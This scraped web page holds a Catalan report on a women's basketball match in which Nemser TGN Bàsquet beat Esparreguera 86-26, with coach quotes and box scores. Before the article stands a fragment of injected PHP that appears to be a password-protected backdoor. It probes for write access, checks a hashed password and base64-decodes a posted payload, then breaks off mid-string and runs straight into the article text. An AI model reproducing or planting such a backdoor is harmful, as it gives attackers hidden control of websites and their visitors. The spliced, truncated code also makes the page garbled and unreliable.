function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Una actuació de pel·lícula (86-26) - Tgn Bàsquet Club -

Una actuació de pel·lícula (86-26)

Updated: setembre 21, 2013

Debut espectacular del Nemser TGN Bàsquet en la primera jornada de curs de la primera catalana. L’equip que dirigeix Juan Carlos Arjona va fer tota una exhibició de bàsquet contra un nouvingut a la categoria, l’Esparreguera, que va pagar els plats trencats de la inspiració del conjunt lila que va ratllar la perfecció davant el seu públic.

El partit només va tenir una història, la que va voler escriure el Nemser TGN Bàsquet des de bon començament. Les noies d’Arjona van marcar un ritme de joc endimoniat i van anul·lar qualsevol intent de resistència del rival des de bon començament. Així, un parcial de 16-0 de sortida en els primers cinc minuts ja va ser un presagi del que es veuria més endavant. L’equip tarragoní va fer una pressió a tota la pista asfixiant i va recuperar un munt de pilotes, un fet que li va permetre anotar en contraatac. L’Esparreguera mai va saber com superar la pressió i les distàncies eren cada vegada més grans. Un triple de Montse Magre a l’últim segon del primer quart va deixar un resultat al marcador increïble (30-3). Les visitants van patir un autèntic calvari en el segon període i també després del descans. La pressió del Nemser no afluixava i, a més, els atacs estàtics del conjunt lila eren molt efectius. L’Esparreguera no va trobar l’antídot. Al descans la diferència ja era de 40 punts (52-12) i va arribar als 53 al final del tercer (71-18). El partit només va tenir interès en saber quina seria la diferència màxima que les locals podrien aconseguir, que va ser de 62 punts (86-24 a falta de poc més d’un minut i mig pel final) en un partit que va suposar l’inici somiat pel Nemser en el campionat.

Juan Carlos Arjona. Entrenador del Nemser TGN Bàsquet

“Estic molt content, s’ha notat molt el treball físic que hem fet durant la pretemporada”

“És una victòria important, la manera de guanyar ens donarà confiança pel que resta de temporada”

“No hem de pensar que tots els partits seran iguals, hem de seguir treballant com fins ara”

Nemser TGN Bàsquet: O Fort (15), Muñoz (6), Vilamajor (6), Villegas (13). M.C. Martí (11) -cinc inicial- G. Fort (1), Magre (17), Sicília (9), Cabré (4), Martínez (2) i M. Martí (2). 3/19 triples: Magre, Vilamajor i Villegas. 9/15 tirs lliures. 14 faltes. Cap eliminada.

CB Esparreguerra: Prat (5), Uranga, Moya (8), Gil, Sepúlveda (2) -cinc inicial- Causo, Provins, Garriga (2), Sánchez, Sicilia (5) i Checa (4). 1 triple de Sicilia,. 5/14 tirs lliures. 19 faltes. Cap eliminada,.

Parcials: 30-3, 22-9 (52-12), 19-16 i 15-8

Àrbitres: Tello i Maza